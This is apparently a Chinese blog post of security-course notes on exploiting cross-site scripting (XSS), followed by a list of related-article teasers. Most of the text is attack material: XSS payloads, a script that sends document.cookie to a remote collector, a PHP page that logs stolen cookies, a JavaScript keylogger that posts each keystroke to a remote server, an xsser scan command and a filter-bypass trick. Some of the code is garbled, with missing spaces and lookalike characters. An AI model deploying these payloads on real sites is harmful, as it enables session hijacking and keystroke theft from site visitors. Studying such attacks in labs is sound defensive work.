【安全牛学习笔记】XSS的利用

最新推荐文章于 2024-08-14 08:00:00 发布
最新推荐文章于 2024-08-14 08:00:00 发布
阅读量549 收藏 1
点赞数
文章标签: xss 漏洞 javascript 服务器 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/edu_aqniu/article/details/73606073
版权

反射型XSS1.概念

通过社会工程学等手段诱骗用户点击某个精心构造的链接,该链接会将恶意的js代码提交给 有漏洞的服务器网站,并由服务器返回给受害者的客户端执行。

2.POC

-<script>alert(‘xss’)</script>
-直接通过脚本插入
-<ahref=''οnclick=alert('xss')>type</a>
-将代码注入到a标签中,点击超链接则执行-<imgsrc=http://1.1.1.1/a.ipgοnerrοr=alert('xss')> -将代码注入到img标签中,加载出错时执行-<script>window.location=‘http://1.1.1.1'</script>
-重定向
-<iframeSRC="http://1.1.1.1/victim"height="0"width="0"></iframe> -加载一个宽和高都是0的框架来执行代码-<script>newImage().src="http://1.1.1.1/c.php?output="+document.cookie;</script> -窃取cookie并发送到指定网址-<script>document.body.innerHTML="<divstyle=visibility:visible;><h1>THISWEBSITE

ISUNDERATTACK</h1></div>";</script> -修改DOM树中的内容

3.窃取cookiejs代码 cookie.js

varimg=newImage(); img.src="http://1.1.1.1/cookies.php?cookie="+document.cookie;

接收页面代码cookies.php

<?php
$c=$_GET['c']; $cookie=fopen("cookie.txt","a"); fwrite($cookie,$c."\r\n\r\n"); fclose($cookie);
echo"success"
?>

恶意代码

<scriptsrc=http://1.1.1.1/cookie.js></script> 

攻击过程:

当恶意代码被执行时,会从外部网址读取cookie.js在客户端上执行,该js会读取当前页面的 地址并发送到指定的接收页面,由页面接收并保存到文件。

4.keylogger键盘记录js keylogger.js

document.οnkeypress=function(evt){
evt=evt||window.event
key=String.fromCharCode(evt.charCode)
if(key){
varhttp=newXMLHttpRequest();
varparam=encodeURI(key) http.open("POST","http://192.168.20.8/keylogger.php",true); http.setRequestHeader("Content-type","application/x-www-form-urlencoded"); http.send("key="+param);

} }

接收页面 Keylogger.php

<?php
$key=$_POST['key']; $logfile="keylog.txt"; $fp=fopen($logfile,"a"); fwrite($fp,$key); fclose($fp);
?>

恶意代码

<script+src="http://1.1.1.1/keylogger.js"></script>

攻击过程:当恶意代码被执行时,会从外部网址读取keylooger.js在客户端上执行,该js记录所有该页面 上的按键操作并发送到指定的接收页面,由页面接收并保存到文件。

5.xss漏洞检测工具:xsser

xsser-u“http://1.1.1.1/dvwa/vulnerabilities/"-g"xss_r/?name="--cookie="securi ty=low;PHPSESSID=d23e469411707ff8210717e67c521a81"-s-v--reverse-check检测xss漏洞
--heuristic检查被过滤的字符

6.过滤绕过

过滤机制:替换<script>字符为""绕过方法:在<script>中嵌套一层<script>--<scr<script>ipt>


存储型XSS1.概念

将恶意js代码永久的存储在有漏洞的服务器上,每次受害者打开该页面时,恶意代码便会在 客户端执行。

2.表单长度限制突破只在客户端过滤且服务器没有很的过滤机制时:

  直接修改客户端源码改变表单长度
  通过截断代理直接在数据包中修改需要提交的内容
爱学习的小牛
关注
[网络安全自学篇] 十八.XSS跨站脚本攻击原理及代码攻防演示(一)
杨秀璋的专栏
10-12 2万+
这是作者的系列网络安全自学教程,主要是关于网安工具和实践操作的在线笔记,特分享出来与博友共勉,希望您们喜欢,一起进步。前文分享了Python弱口令攻击、自定义字典生成,并构建了Web目录扫描器;本文将详细讲解XSS跨站脚本攻击,从原理、示例、危害到三种常见类型(反射型、存储型、DOM型),并结合代码示例进行详细讲解,最后分享了如何预防XSS攻击。本文参考了爱春秋ADO老师的课程内容,这里也推荐大家观看他Bilibili和ichunqiu的课程,同时也结合了作者之前的编程经验进行讲解。
XSS总结
weixin_51356351的博客
11-19 1576
xss理解 1、简介 xss(cross site script)跨站脚本攻击,为了避免与css混淆,所以简称为xss。 2、什么是xss xss全称叫跨站脚本攻击,因为应用使用了js框架,因为应用未做任何防御措施,导致了攻击者使用对应的payload进行攻击,受害者运行了攻击者的payload,将攻击者所需的cookie发送给了攻击者,最本质的是服务器并没有完全过滤客户端提交的数据 3、xss的危害大吗? 答:很大,是现在web主流的攻击方式。 4、xss攻击都可以导致哪些危害 (1)钓鱼欺骗 (2)网
xss 利用方式
07-30 813
漏洞原理   HTML是一种超文本标记语言,通过将一些字符特殊地对待来区别文本和标记,例如,小于符号(<)被看作是HTML标签的开始,<title>与</title>之间的字符是页面的标题等等。当动态页面插入的内容含有这些特殊字符(如<)时,用户浏览器会将其误认为是插入了HTML标签,当这些HTML标签引入了一段JavaScript脚本时,这些脚本...
XSS(跨站脚本攻击)——原理、基本类型与应用(反射型、存储型)
最新发布
m0_74249600的博客
08-14 1286
本文讲述了XSS的原理以及两种基本类型:反射型、存储型的讲解与靶场实践,请关注持续更新(本文部分内容来自课件,如有版权问题请与我联系)
xss的原理及利用
qq_54030686的博客
11-15 1135
xss的原理及利用 xss分类 反射型xss 存储型xss DOMxss xss为一段js或者html代码,可直接在html写入,在数据传输的过程,未对用户输入的数据进行过滤导致攻击者构造的特殊语句被浏览器解析执行 xss的分类实际上由数据存储的位置决定,反射型xss以及DOM型xss都不写入数据库,而存储型xss则会写入到数据库,造成的危害及获取的信息各不相同, 反射型xss 攻击者在参数加入恶意攻击代码,服务端将数据拼接到html,返回用户导致反射型xss(局限,只能作用于当前用户) 存储型
XSS漏洞检测和利用
2401_84434570的博客
04-22 977
通过构造一些特殊的xss poc,在可能出现XSS漏洞测试点将这些语句传入网站,我们就能过够相对轻松的探测出XSS漏洞
XSS漏洞利用方式总结
XunanSec的博客
05-21 4861
前言: 最近一直在挖漏洞,碰到的XSS漏洞最多了,今天就顺便来讲一下,如有错的地方,烦请指出。 00×1什么是XSS漏洞XSS又叫CSS (Cross Site Script) ,跨站脚本攻击。它指的是恶意攻击者往Web页面里插入恶意html代码,当用户浏览该页之时,嵌入Web里面的html代码会被执行,从而达到恶意攻击用户的特殊目的。 ​ 00×2 XSS漏洞有什么危害: 1、盗取各类用户帐号,如机器登录帐号、用户网银帐号、各类管理员帐号 ...
XSS简单理解--安全(三)
qq_43371350的博客
03-26 521
XSS,跨站脚本攻击 通常指黑客通过HTML注入(控制输入变量)篡改网页,插入恶意脚本 防御手段:在输入时过滤某些语句(黑名单/白名单技术) 构造的URL如下: http://192.168.122.130/DVWA-1.9/vulnerabilities/xss_r/?name=<script>document.location = 'http://172.16.20.116:808...
【Web安全基础】XSS原理及利用
Yuan's Blog
08-27 234
文章目录定义绕过利用方式防御原理 定义 XSS(Cross Site Scripting),即跨站脚本攻击,是指攻击者在页面注入恶意的脚本代码,当受害者访问该页面时,恶意代码会在其浏览器上执行。根据恶意代码是否存储在服务器XSS可分为存储型XSS、反射型XSS和DOM型XSS。 绕过利用方式 双写绕过:<scri<script>pt> 大小写绕过:<ScRipT> 其他标签:<img> / <body> 防御原理 防止XSS攻击的核心原理
安全学习笔记XSS-简介、跨站脚本检测和常见的攻击利用手段
edu_aqniu的博客
11-28 284
XSS 攻击WEB客户端 客户端脚本语言     弹窗警告、广告     Javascript     在浏览器执行 XSS(cross-site scripting)     通过WEB站点漏洞,向客户端交付恶意脚本代码,实现对客户端的攻击目的     注入客户端脚本代码     盗取cookie     重定向 VBScrip
安全学习笔记】反射型XSS攻击漏洞的原理及解决办法
热门推荐
edu_aqniu的博客
10-23 1万+
发射型XSS 漏洞的原理及修复方法 1.常见的触发场景 2.漏洞原理 3.漏洞危害 4.一些tips 5.如何避免&修复漏洞 直接将用户数据输出到浏览器,没有做安全处理 搜索: www-data@:~/controller$ vim searchController.class.php class secrchController
安全学习笔记】存储型XSS和BEEF浏览器攻击框架
edu_aqniu的博客
09-30 4894
存储型XSS                                                               长期存储于服务器端                                            每次用于访问都会被执行javascript脚本                    Name:客户端表单长度限制           
安全学习笔记】CSRF
edu_aqniu的博客
09-30 531
CSRF                                          Cross-site request forgery                与XSS经常混淆                                  从信任的角度来区分                                XSS利用用户对站点的信任   
【网络安全XSS漏洞- XSS基础概述及利用
goldfish8848的博客
06-12 1366
跨站脚本(Cross-site Scripting)攻击,攻击者通过网站注入点注入客户端可执行解析的payload(脚本代码),当用户访问网页时,恶意payload自动加载并执行,以达到攻击者目的(窃取cookie、恶意传播、钓鱼欺骗等)为了避免与HTML的CSS相混淆,通常称它为XSS
【网络安全渗透测试入门】之XSS漏洞检测、利用和防御机制XSS游戏(非常详细)零基础入门到精通,收藏这一篇就够了5
Libra1313的博客
06-27 1027
这是大白给粉丝盆友们整理的网络安全渗透测试入门阶段XSS第5篇。本阶段主要讲解XSS漏洞检测、利用和防御机制。
XSS高级利用
S1lenc3的博客
11-03 130
XSS会话劫持 (1)Cookie简介 Cookie是能够让网站服务器把少量文本数据存储到客户端的硬盘、内存,或者是从客户端的硬盘、内存读取数据的一种技术。 Cookie是一段随HTTP请求、响应一起被传递的额外数据,主要作用是标识用户、维持会话。 浏览网站时,该网站可能会在电脑硬盘写入一个文本文件,可以记录ID、密码等。这个文件就是Cookie文件,当再次浏览网站时,网站会读取...
XSS详解及其利用方式
读书 买花 长大
11-14 3983
XSS-xss
XSS学习 xss-Lab题解
qq_61768489的博客
02-12 2469
level 1 没有任何防护,直接url传xss name=<script>alert(1)</script> level2 有个input标签,尝试用"> 闭合标签 (在网页代码,我们输入的数据,是在表单的value属性内,所以需要先闭合input标签,然后在注入代码,闭合标签) "><script>alert(1)</script> level 3 测试发现尖括号被转换字...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值